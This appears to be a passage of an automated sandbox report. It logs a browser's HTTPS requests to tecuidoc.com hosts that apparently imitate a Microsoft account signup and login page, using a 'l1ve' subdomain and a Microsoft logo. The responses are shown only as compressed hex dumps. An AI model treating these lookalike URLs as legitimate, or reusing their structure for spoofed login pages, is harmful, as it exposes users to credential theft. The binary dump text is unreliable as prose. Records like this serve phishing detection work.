                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:37 UTC736INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:37 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465611
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C00FF3F62A
                                              last-modified: Sun, 21 Apr 2024 05:01:10 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 3c7acae4-d01e-00e6-1aad-93b55d000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:37 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                              Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                              2024-04-26 14:57:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.649778198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:34 UTC733OUTGET /images/favicon.ico?v=2 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:37 UTC671INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:37 GMT
                                              Content-Type: image/x-icon
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465307
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C017611702
                                              last-modified: Sun, 21 Apr 2024 05:01:23 GMT
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 0ad754d0-601e-00d9-2dae-931d53000000
                                              x-ms-version: 2009-09-19
                                              2024-04-26 14:57:37 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                              Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                              2024-04-26 14:57:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.2.649779198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:34 UTC1306OUTGET /Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Purpose: prefetch
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:37 UTC663INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:37 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public,max-age=31536000
                                              last-modified: Tue, 23 Apr 2024 14:29:38 GMT
                                              accept-ranges: bytes
                                              etag: "075baab8a95da1:0"
                                              vary: Accept-Encoding
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              amserver: EUSXXXXGN00000C
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: E8A41143AFF4407098FEA3E42D6D0616 Ref B: DFW30EDGE0122 Ref C: 2024-04-26T14:57:36Z
                                              content-encoding: gzip
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:37 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                              Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                              2024-04-26 14:57:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.2.649780198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:34 UTC687OUTGET /oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:38 UTC741INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:38 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 105811
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465338
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C024BDDFEE
                                              last-modified: Sun, 21 Apr 2024 05:01:45 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: a8b75949-d01e-00f6-6bae-93057f000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:38 UTC13693INData Raw: 1f 8b 08 00 00 00 00 00 00 03 bc bd 69 73 db 48 b2 2e fc 7d 22 e6 3f 90 b8 0e 1d a0 55 a2 49 6d dd 06 5d c3 90 b5 d8 b2 ad c5 5a 6c 77 73 74 14 10 59 94 60 51 00 8d 45 8b 2d 9e df 7e f3 c9 2a 00 05 92 9e 99 7b ef 1b ef 4c 5b 44 ed 5b 56 56 66 56 66 d6 cb df 9a 7f ff 5b e3 b7 46 67 e7 b4 f1 fe b4 71 ba f3 a1 b1 1d 27 4a 34 d6 5a ab ad 4d 4e da 8e 27 4f 49 78 7d 93 35 dc 81 d7 38 08 07 49 9c c6 a3 ac 11 44 c3 c6 20 8e b2 24 bc ca b3 38 49 5b 8d ad f1 b8 c1 39 d3 46 a2 52 95 dc ab 61 8b ab 70 ab 52 fb 51 a6 92 28 18 37 8e a2 f1 93 87 d4 97 7f ff db 7d 90 34 22 99 dd 84 a9 50 72 94 47 83 2c 8c 23 37 f2 7e 3a 79 aa 1a 29 35 31 c8 9c 2e 72 1d 4b a7 48 77 44 2e 9d f8 ea 9b a2 34 2a e6 e4 d1 50 8d c2 48 0d 1d 91 4a 67 92 c4 59 9c 3d 4d 94 23 76 a5 73 13 a4 47 0f
                                              Data Ascii: isH.}"?UIm]ZlwstY`QE-~*{L[D[VVfVf[Fgq'J4ZMN'OIx}58ID $8I[9FRapRQ(7}4"PrG,#7~:y)51.rKHwD.4*PHJgY=M#vsG
                                              2024-04-26 14:57:38 UTC16384INData Raw: a6 e8 8c b1 36 fa d0 62 7b af ed 68 91 a7 33 28 c6 4f 67 e0 78 be bf f7 85 0e 3d 63 87 4c 64 8b 2e 08 4a c8 c1 fd 1b 55 39 21 3e d6 7e 53 b7 d6 b3 5d 26 5a 40 c6 95 e8 d1 f2 f8 c7 c5 ee 83 9a 8a 19 71 14 ac ac d7 51 eb 9e 38 24 d2 06 34 7c 91 d1 3d a4 38 59 78 15 43 84 4d 09 63 63 ea e5 1f d4 8f 93 c3 82 17 a8 d7 d3 16 78 03 8e ca 64 34 e3 f3 73 76 3c 15 7d e7 17 52 62 e7 02 b4 ae 16 1d ce b9 50 ba 67 7c 62 84 8c da bf 7e f5 72 b2 27 ca b3 cb 4d 4a 6a 6f a3 fd 0b 72 2f 69 31 43 54 e8 ac 41 96 68 84 41 74 f4 c4 20 a8 34 e5 5d f3 7c 48 f0 3e 53 2c 82 50 ae 2d 1e f9 02 28 c6 b3 4d 3c 49 ec 37 4c df c3 c7 b3 b4 58 e0 1a c2 07 97 f4 44 ae a5 ac 03 ba c9 66 27 39 53 3f 54 c7 88 ba 3c a6 99 a0 69 d2 92 8c 05 67 75 71 61 99 d7 f9 b5 53 8d 77 44 8c c2 44 4b c3 23
                                              Data Ascii: 6b{h3(Ogx=cLd.JU9!>~S]&Z@qQ8$4|=8YxCMccxd4sv<}RbPg|b~r'MJjor/i1CTAhAt 4]|H>S,P-(M<I7LXDf'9S?T<iguqaSwDDK#
                                              2024-04-26 14:57:39 UTC16384INData Raw: a9 13 ef 17 26 c5 5a df 72 75 53 bd ba e9 bf 5a dd f0 5f ad ae bd b2 71 6d 65 ab 95 89 9b 9a e2 ab 99 87 03 fb 7b 2f 34 0f df 73 b1 0e 75 18 ff 7a 89 c3 ff c9 12 c7 f6 12 c7 7a 89 d3 25 4b 4c d7 c7 30 3d e6 3b d5 ac 64 95 82 6e d1 a8 cb c5 27 72 43 d6 76 52 5f 5b 0e 17 67 56 75 20 fa f2 44 ba b3 97 5c b9 e1 95 74 48 56 ac 79 42 d7 c2 ab 34 ad 07 04 05 b0 62 94 ba 3b 0c 86 86 ed 9b 78 fe 50 ee 0b c4 8d 09 1c d4 14 9f 53 db a7 8e 5a 16 5f e5 8c a3 ca e6 9e 00 35 f6 28 00 8b 73 01 35 db 80 72 20 ff 0b 9f 16 72 01 85 a9 48 4a 0e 5d 00 3d 36 9a a5 b8 0a 5d 40 5f d7 e6 ac 31 1b 72 b3 d5 35 2e a3 65 aa 26 b8 08 e4 a2 02 60 bf 5a aa d4 95 52 56 93 95 92 4a 5b d5 5a 53 29 58 06 21 b0 d5 5a f2 48 92 4f e7 b7 0a d8 48 a7 98 2d 7f 04 fc 79 a4 29 8c 91 26 a0 98 1f 82
                                              Data Ascii: &ZruSZ_qme{/4suzz%KL0=;dn'rCvR_[gVu D\tHVyB4b;xPSZ_5(s5r rHJ]=6]@_1r5.e&`ZRVJ[ZS)X!ZHOH-y)&
                                              2024-04-26 14:57:39 UTC16384INData Raw: 34 ac 72 49 fc 05 e4 94 0e e7 55 e6 72 80 12 99 28 cb 7e 86 16 62 08 50 d2 1d 63 01 e0 a4 d3 eb 5d ce 21 54 fa 73 ac 1e 9f db 9e 37 e6 35 17 45 39 00 74 86 fe 00 35 3a 64 a4 14 bb 8a 6d 28 dc 41 40 a8 d1 07 b7 00 fc f1 d8 a0 c2 e9 38 5a 59 8c 92 7b ef 28 a5 c5 b1 24 c3 e0 22 d3 09 83 06 7c 54 63 25 c2 6a b1 e8 aa 3c 53 5f 0b f5 8d 27 1f f3 39 08 70 8d d2 0c 13 25 cb 4b d1 da 72 85 d6 69 b4 e9 0e 63 18 a0 f9 2e 50 e7 f4 8c 2f 3b 70 6d b8 ed 24 53 77 99 4b c8 4e f7 6b ec 47 90 f0 cd bd 8e e9 83 10 57 4f a7 d2 97 ab f0 76 9d 0f d9 b8 a1 dd e8 7e 43 b4 92 22 48 63 8e 4b ea c0 03 5b ee 33 03 db 8a cc e2 4a ed 3c 1a 4c 60 3a 28 d1 61 a4 b6 72 f5 d9 84 de 70 d6 5d dd ce 08 b0 c6 da a4 9b d9 ee fe 04 88 be b4 70 18 5e 45 87 31 ec 16 9d fd 34 31 4d 7d 2b e7 4a 76
                                              Data Ascii: 4rIUr(~bPc]!Ts75E9t5:dm(A@8ZY{($"|Tc%j<S_'9p%Kric.P/;pm$SwKNkGWOv~C"HcK[3J<L`:(arp]p^E141M}+Jv
                                              2024-04-26 14:57:39 UTC16384INData Raw: f1 3d 63 b1 b3 4c 46 c4 0b c2 fa e9 de 77 b7 fc a4 c3 e1 25 de a5 12 df 99 85 b4 13 ed fb 9d 69 ab 7f 63 32 24 5e b7 39 9e fd ea 66 d3 95 76 38 08 c5 fc fc ac 2c 75 48 35 fd b8 36 71 e5 d4 0f ba 6d 6e 03 b0 39 80 4b 3a cc 0b a2 fb b9 2c a4 99 85 f1 03 ba b5 34 24 18 df 07 3f f3 0f 39 9e 30 3e 86 83 58 0c 45 a3 3f e7 73 44 ef 17 d8 66 e8 ab a5 31 8b b6 01 2c 92 8a 34 4c 69 d5 38 97 34 5b 3c 07 91 7f 4d 62 f3 fc 8a e6 be e8 54 02 b1 b0 44 4b 07 c3 65 d5 3f f3 86 7d b5 ac 56 ce 70 32 c7 f8 d5 b2 8d e6 78 e4 03 22 41 0c 02 04 29 33 ba b6 a0 e3 7d 71 33 09 5b 92 d5 89 ac 23 27 da cf 16 25 85 5c 31 2c cc 83 70 16 07 69 1d 60 67 ae 7a 49 a5 8a 17 f6 0d cb 92 cf 07 19 6b 89 26 1e 0c 8d 0a 6c 2e a6 8d a8 33 03 02 13 6f 39 c3 15 b5 cc 69 1c 5a 0f a5 4c 89 95 33 b0
                                              Data Ascii: =cLFw%ic2$^9fv8,uH56qmn9K:,4$?90>XE?sDf1,4Li84[<MbTDKe?}Vp2x"A)3}q3[#'%\1,pi`gzIk&l.3o9iZL3
                                              2024-04-26 14:57:39 UTC7952INData Raw: 1a 2a 9f a6 ee 76 77 18 1e 11 9d b4 fd 23 8b 86 db 33 2c cf 6d b3 45 e8 73 3e de 77 62 38 7e be f9 92 75 0f 87 47 f8 79 4f 3f 7a 4e 80 f8 f8 fb dd 57 14 8d 2d d4 d6 77 97 d4 e3 3f 34 6b 84 8d 80 15 c8 8c 6d 50 df 8d cb ee 32 b5 a0 b6 f5 6d 67 56 87 a5 bb bb 52 c2 b5 45 76 fb 6e 4b 2d fd a1 91 43 59 b7 e8 8d c1 05 77 f6 26 af f5 26 2f 7b 93 8c 66 76 46 4b 3a eb 0e 25 23 c8 52 14 32 55 96 a9 8c 48 7a f7 78 51 30 c3 3f e9 dc 9d 53 55 ce fb fd cb ba 3a e4 65 a5 9f ff ff 96 95 1b 13 e9 b7 fb 3b 7b 29 9d bd fc e9 ce d2 e4 3e d3 9d 95 f6 7f 9a a2 ba bb bb 55 ee 79 ad 9b e2 ec 65 0d 65 dc 58 0b ca 8b ac 7c 6c 69 e3 c0 92 8d fd 1c 8c 31 e0 b0 8b fb 70 e0 a4 f9 f9 6f 20 3a 89 a0 8c 85 98 04 23 bd 36 b2 df 67 b3 5e 55 9d 39 f8 8b c3 fb 5e 1b 5e 69 d3 24 11 27 e6 6e
                                              Data Ascii: *vw#3,mEs>wb8~uGyO?zNW-w?4kmP2mgVREvnK-CYw&&/{fvFK:%#R2UHzxQ0?SU:e;{)>UyeeX|li1po :#6g^U9^^i$'n
                                              2024-04-26 14:57:39 UTC16384INData Raw: d8 5f 5c 1e bf 48 8c e3 b8 f1 c2 82 f6 8c 44 38 24 e9 8e 8f 96 e7 5e 0d dc a1 98 d6 0a 60 09 0e ac a7 21 66 f1 65 32 66 1f 25 ab 6c 0b 64 8f 06 e7 7a 5e 13 53 a3 20 a3 4b 93 c6 be 3c 79 92 d8 3a 89 4c a0 5a 14 57 5b 84 fb dc 45 25 41 22 a2 61 a8 98 8b 7a 0f 8b 6c 58 9d 43 7b 9e f7 db ac 2a 30 7d 2c 6d 5a 75 62 80 f0 64 24 96 1e 32 d9 2b d3 ef 71 43 bc c7 55 85 3e 50 a1 27 36 3a b2 e2 b1 af 37 bd 79 aa 2d d5 b0 04 6e 06 86 5f 6f d8 0b c2 eb c2 41 89 cc d2 44 19 1b 93 86 48 91 e7 4d a7 7e 88 f2 33 ec eb 2d 96 bc 64 cd 00 61 fa 5b f6 7d 7e b0 c4 62 c5 58 8c 27 89 8f a4 c8 32 6b dd 33 0d 58 14 2d ac 5e 2c 3e 83 eb a6 98 2d c7 72 ad 86 b3 40 f5 26 7c 73 ba a3 93 2f 23 31 38 26 0f a2 46 72 51 f3 0f aa 93 75 55 56 49 fd 50 e1 b9 b3 b8 94 f1 28 c5 e2 d1 8f 76 6f
                                              Data Ascii: _\HD8$^`!fe2f%ldz^S K<y:LZW[E%A"azlXC{*0},mZubd$2+qCU>P'6:7y-n_oADHM~3-da[}~bX'2k3X-^,>-r@&|s/#18&FrQuUVIP(vo
                                              2024-04-26 14:57:39 UTC2246INData Raw: 8b e0 3a cb 0b 3e 93 61 f7 a6 fc f4 84 ce 65 32 89 d9 ff 4b 61 fc bf f4 e5 59 ea c0 7e 36 33 1c 8d ba d8 52 9c 4c 11 66 25 1f 02 1f b4 59 93 2d f1 82 11 bc 71 e5 20 18 7e 91 04 03 0e 18 04 78 6e 70 39 4c 93 3e 58 83 e7 37 d8 06 76 ba 67 87 04 90 8e f7 66 99 e6 74 2c ef 7b 0f 59 6e b2 a7 3e bb 3c fb c2 63 67 7d b2 61 7d 28 31 44 05 a5 36 e6 04 e0 06 dd 59 26 0b 2b 0e 44 e8 37 2e 02 a5 57 17 aa 12 be 81 bc 23 a0 d0 31 b5 67 de 8f 85 b2 7a f3 23 b6 2a a9 a2 af 8a 2c 5d 32 73 51 66 33 73 54 80 d6 6a 94 11 2f 17 cc 38 42 96 a6 33 18 34 32 3a f2 d0 57 f6 ca 5e 84 59 b5 47 38 6c 7d b9 6f d9 6b 6c 98 79 7d 22 39 e0 e6 cf d3 5e 00 78 7f 13 ce 92 28 6b 95 f8 91 04 7c 35 15 8b 74 11 71 db 6b 16 90 47 57 0f 75 19 57 3d 68 24 41 23 44 d6 28 77 3e 8e da be d2 05 27 7d
                                              Data Ascii: :>ae2KaY~63RLf%Y-q ~xnp9L>X7vgft,{Yn><cg}a}(1D6Y&+D7.W#1gz#*,]2sQf3sTj/8B342:W^YG8l}okly}"9^x(k|5tqkGWuW=h$A#D(w>'}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              57192.168.2.649781198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:37 UTC611OUTGET /datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:40 UTC739INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:40 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 3505
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465629
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C00E1BF22D
                                              last-modified: Sun, 21 Apr 2024 05:01:07 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: f51be461-301e-007c-7cad-935c3f000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:40 UTC3505INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 59 5b 73 db 36 16 7e cf af a0 51 8f 4c 8e 60 46 49 db dd ae 18 44 e3 da 71 e2 dc 63 2b cd 83 e3 e9 d0 24 24 31 a6 49 96 04 2d 2b 92 fe fb 7e 07 e0 4d 96 d2 d9 9d dd 4e 1d 13 07 07 07 e7 7e 81 f7 26 65 12 a8 28 4d 6c 67 59 7f 5a d2 96 9d 95 a2 55 2e 55 99 63 a7 d7 93 6e a1 7c 25 85 88 7b 3d 5b ba 59 2e ef 9a 0f 37 91 f7 4a 48 fd cb e1 e6 b7 de a4 0f 8d 21 0c a2 c3 4f 84 00 31 fb a4 c1 de 37 80 fd 06 a3 be a8 e4 b2 3e aa c9 27 65 1c f3 c5 e1 21 30 d6 0d 93 3e 31 19 4d ec 2e 83 a5 b3 bc f3 73 2b 17 fb 5e 3e b2 f3 8a b9 9a 5a ee 0c 71 39 ae 95 cd 4d 20 db ef af 5b a2 13 28 65 ef af 5e 6f ef ba d7 5b f4 7a f7 cf e7 60 f0 5a cc a3 24 4c e7 6e 21 d5 38 ba 95 69 a9 ec 29 2f 1c a7 3d 77 47 cc 98 ab ed 44 ce ad 13 10 77 dc a9 c1 b7
                                              Data Ascii: Y[s6~QL`FIDqc+$$1I-+~MN~&e(MlgYZU.Ucn|%{=[Y.7JH!O17>'e!0>1M.s+^>Zq9M [(e^o[z`Z$Ln!8i)/=wGDw


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              58192.168.2.649783198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:38 UTC1275OUTGET /Resources/images/favicon.ico HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Purpose: prefetch
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: empty
